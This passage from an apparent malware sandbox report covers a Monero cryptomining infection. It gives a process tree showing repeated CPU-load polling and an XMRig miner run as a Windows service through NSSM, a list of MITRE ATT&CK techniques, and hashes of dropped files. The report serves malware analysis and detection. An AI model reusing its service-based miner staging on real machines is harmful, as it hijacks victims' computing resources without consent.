- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1924
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4340
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1152
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3d24ee7706a2ca48bb579baeb969501f

SHA1
431fec5f67ff8d36f400cd6af727fc526debc7c9

SHA256
e09febd2ab7f643e230292f85757a779ff5de3ba7673405c228f213de4040516

SHA512
98c52f06707cfa67cae135a64fcf1588155e956abae02ae352c657f8f58960f63ff6cabc93fc31d65398c037e828fab5fbbd2ba2bffd9b0261c835afeb2aaac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
58f4289b832fa5b46b1e56574800c039

SHA1
3e1dab4adfe0dd6bec311b5d4be14065032a14e8

SHA256
9859c147792e4ac8df5f6e0c4b364fe887adc3d2b2945d0d234a573af03d1599

SHA512
c56032166ae0c98f5d52c715f2f1b05aafc6b0b579246ebe75c57a53d196fbf17ccfec0612e827bd6c563b1dcb19663f7bd02291d37876c9f9c6d7969da7cd8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2d97c9054a648b0338e3c7962700374f

SHA1
a563b3f43815b8684cec8ba50e1d9e98425ea1c4

SHA256
060d6d782ef7e7618b47267e35e9d8f3c9e3f30c6bb0bfa4252e1ef05cf52987

SHA512
3557899d4a65b906f8ebce9c2ad93cdea362913da0b8f657a72c9dea2e6ce967228a48dd0119df2a06d617ad689003bd5288e549c5b706f0ad95e8c8fa7f013a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0279dc463cd9625e10a4fa4a26ab0f17

SHA1
845d49c2b30801a2cfab53d94bfe342c387b6f9a

SHA256
d5e05bcd79fb545978db01c75147b3abd88f8ccbbb4a380c10005ae44e69649c

SHA512
7d2bc4601502e555bf2687995de7c1587ca933e80e78b1f0850d007fa2afbd59fec269ce68a3a95199b082431a821db55828250d599650cde857ea03ca09d1a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b68dd937b1b5e11650005fe38786e4df

SHA1
bc269d0d8aa32cce7423a2427e0a13b4b493d02d

SHA256
d59db858e6d8b02cca7fd5babceb86464a55fd60e185a4d30cd1e5f3659c0d8d

SHA512
3b47925701de389e62f3824da00c6f31feda6249fbd9111f48fe88da6a48a67b76814e8cd798145d3187ce709bd1b96cea0ee7693221540a5650e8651f245137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5ae22d566584357c2857f059d96796f8

SHA1
aba4dd38202620116bbb1dd53df55c3ff10d6c5d

SHA256
218a3296e7707303c2f78097f70618129a8827a6b5e943f627683f16daae6927

SHA512
73690d54451e9a069ff2660bdfc23610dc48d8a332bd27327dff55efea4bdbc66a99ee5a52f5b268fc97a37f0c6121f827ea68cd24a4a26dd366d46627eae4a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36e94b60579903b5c7a37115144883f3

SHA1
1d81f26951503648524d28ceaa535a3b7bb828d1

SHA256
de3fdc503bd6b8664379b6c533ebb0be003739c9edce0f239ea5f93ff45c8892

SHA512
2d7e8fcc43206aa1aee98a6869e0fb7e370dd4a8f7f2e78f48c345e66e4955e8774f59c05473373b8d235b2f9a96753d5797c0cd0943ff772484a4b3be0974a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e6baeec02c3d93dce26652e7acebc90

SHA1
937a7b4a0d42ea56e21a1a00447d899a2aca3c28

SHA256
137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

SHA512
461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a5a5d4b716f2de614f85c418a88aacb

SHA1
a09c5a404306c5056119af565144dfba9e4f8c8d

SHA256
256aab870f7eb804c011f4a40ee4e8c920075bf24861e639ff5968fb2b9b808d

SHA512
e9a784c44fe6d46836ff4c6849949fe3322cd59457eb790bf8bf637070677ec679d825bb8cac54e2060b4438428fd8b53ef6de9d75d9365b9020e18182121a2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
13c867fc0152253348b04eabc688dcc8

SHA1
aeb10c5bb8ea4577c57ff4e5c00b8d927e80394a

SHA256
cdf0a677ceb308f863ddd997bb6a19b0146329c7ff396aa19dbdf29764170fd7

SHA512
1157dd6ebe06a6ac408c7c8d477a87a549b2362fcf02910b121d3c3a019cc7bb7a8f65c68790eda268d3918fc368fa1139cee6c9783460092473e9757281b7d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2b1197120326a33663f426ba4a827059

SHA1
3a37f3a77ced744194e8aed477b592110fd3a480

SHA256
c109609b2c0e5d85d63db58f76be777d61689e24fda709fe79aac97d76aae906

SHA512
24fcf75626289b9429ddc69f52b1a02f20a2493de9e32d34aeecf8b66230058cac93115782ee5b32232a1705443edffb9d18ab2487be807b310104a7053f0146

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cl3fq2xj.dih.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
8765fcb4a9c67a1983a1c01545af25ab

SHA1
bde173cae84396e566f6e2c87f1822699dd80058

SHA256
be8a166a959fe340f2ca2c7a61791fab6bfe6328cda674fd6798613ecb7e06d4

SHA512
0a25c848f4c5d7718bed4ae729c2f86e322751e33cd16ddb770ebd75fc1a36233098ee28caaebc4aaa77e14f40962d92f956263254f3f95647e99e1ad0d1c0e3

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e9296b701fad0a390eca69e942d63f0f

SHA1
2e159dd392f12d41b1a7879f11a70e942d8fda9b

SHA256
50a3d9a2383826d5fe1de1068a1097dbb04f91dc7e9ee94619c62f814423069d

SHA512
6837d375783b6b821b713db3261afbded122d251a9a0a2a75b1a6ee96dd535011e8c689bdfda1d21cfd038a7828e50c58d2761dfc2cb621792bbe55158bf4c51

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e826268ae8bcd5c268a4b8db70079850

SHA1
bc5f851123ab2b510b365863b03673b19448f27b

SHA256
b8afbc57b14fcd8ab9f903238c9112eac6350150ce876e4858580f64545f0c7e

SHA512
1d1fe6556415ca9fdd347d3b590bf93cf9bab5f1a73b39cb2655642cac49c31514fab6a26bc5837392e7a91137c520c81abd8d0622752627ce13960f6d8a73f3

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config_background.json

Filesize
2KB

MD5
2790ba9fb342bde75d9d628f1eb27385

SHA1
0136893926096fc331a0dd89f56d06c737bb6f07

SHA256
beb3080927d7ba9db45608948c4e4d2d522b6c3f2d9429e7858f6f6b0e2040bb

SHA512
9c2c02f9f9fa9b8a15bc356c1590c3e8588783b072843f5b643d7bc8d32a472a8e3cb671f696ba24639479510f9e6e1c767a409871523235059342fe2c0723a0

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/3204-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-250-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-249-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-248-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-247-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-246-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-245-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-244-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-243-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-242-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-241-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3204-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
